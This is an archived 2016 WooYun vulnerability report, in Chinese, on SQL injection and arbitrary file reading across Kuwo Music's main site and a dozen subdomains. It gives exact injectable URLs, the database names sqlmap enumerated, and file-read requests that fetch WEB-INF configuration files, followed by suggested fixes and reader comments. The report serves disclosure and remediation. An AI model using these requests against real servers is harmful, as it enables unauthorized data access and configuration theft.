破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

酷我主站及十多个分站SQL注入+文件读取

编号221469
Urlhttp://www.wooyun.org/bug.php?action=view&id=221469
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题酷我主站及十多个分站SQL注入+文件读取
漏洞类型SQL注射漏洞
厂商酷我音乐
白帽子pandas
提交日期2016-06-21 16:06:00
公开日期2016-06-27 09:39:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank0
漏洞简介
酷我主站及10+个分站SQL注入+文件读取,打个包。
漏洞细节

漏洞站点统计:

http://yule.kuwo.cn/
http://kappa.kuwo.cn/
http://huodong.kuwo.cn/
http://album.kuwo.cn/
http://playlist.kuwo.cn/
http://play.kuwo.cn/
http://changba.kuwo.cn/
http://www.kuwo.cn/
http://tupian.kuwo.cn/
http://hbtv.kuwo.cn/
http://gxtv.kuwo.cn/
http://yinyue.kuwo.cn/


目前搜集到以上连主站共12个站点受影响,可能还有遗漏。
一.SQL注入:
http://www.kuwo.cn/huodong/wanmei/xianglong/getAllWork?orderby=flowers&huodongName=wanmeixianglong&curpager=1
漏洞参数:orderby
SQLMAP可跑数据:

QQ20160621-0@2x.png


涉及21个数据库:

available databases [21]:
[*] ACT
[*] BELL
[*] Cafe
[*] CONCERT
[*] CROWD_FUNDING
[*] information_schema
[*] KGE
[*] KGE_ACT
[*] KGECOMMENT
[*] KW_TV
[*] LISTEN_STORY
[*] MANYOU
[*] mysql
[*] NEWS
[*] performance_schema
[*] RESWIKI
[*] SPEAKER
[*] statistics
[*] TAOBAO
[*] test
[*] YAHOO


其余的站点都可以用sqlmap跑数据,漏洞点相同,附一张SQLMAP证明:

QQ20160621-1@2x.png


POC

二、文件读取
这是一个历史问题,之前也有白帽子提交过,但厂商一直修复不好。
主站:
http://www.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/web.xml?&pn=0&subid=142

QQ20160621-2@2x.png


http://www.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/classes/config.properties?&pn=0&subid=142

QQ20160621-3@2x.png


http://www.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/classes/log4j.properties?&pn=0&subid=142

QQ20160621-4@2x.png


同理:其他的分站点也存在该处文件读取漏洞,厂商还是抓紧修复下。

修复方案

1. SQL注入:orderby参数严格过滤;
2. 文件读取:结合该功能点,判断是否跨越目录读取文件。或者用笨方法,判断好 ../ 、 WEB-INF 、 jsp$(jsp结尾)等文件不可读即可。

状态信息 2016-06-21: 细节已通知厂商并且等待厂商处理中
2016-06-21: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-27: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复None漏洞Rank:15 (WooYun评价)
回应信息危害等级:无影响厂商忽略忽略时间:2016-06-27 09:39
Showing 1-10 of 10 items.
评论内容评论人点赞数评论时间

洞主你是酷我杀手

奶嘴02016-06-27 09:51:00

想知道我天哥在哪找的点

bigric302016-06-21 23:55:00

@null_z 自己写的url采集规则 检测使用的sqlmap

方大核桃02016-06-21 20:00:00

@方大核桃 sqlmapapi??

null_z02016-06-21 16:53:00

你们都好厉害啊,都有扫描器。

pandas02016-06-21 16:36:00

刚扫过的路过~好尴尬

D&G02016-06-21 16:35:00

@方大核桃 尴尬

F4K3R02016-06-21 16:33:00

@方大核桃 众人拾柴火焰高

whynot02016-06-21 16:25:00

@方大核桃 尴尬

xsser02016-06-21 16:21:00

昨天扫描器刚扫过...一无所获...尴尬...

方大核桃02016-06-21 16:15:00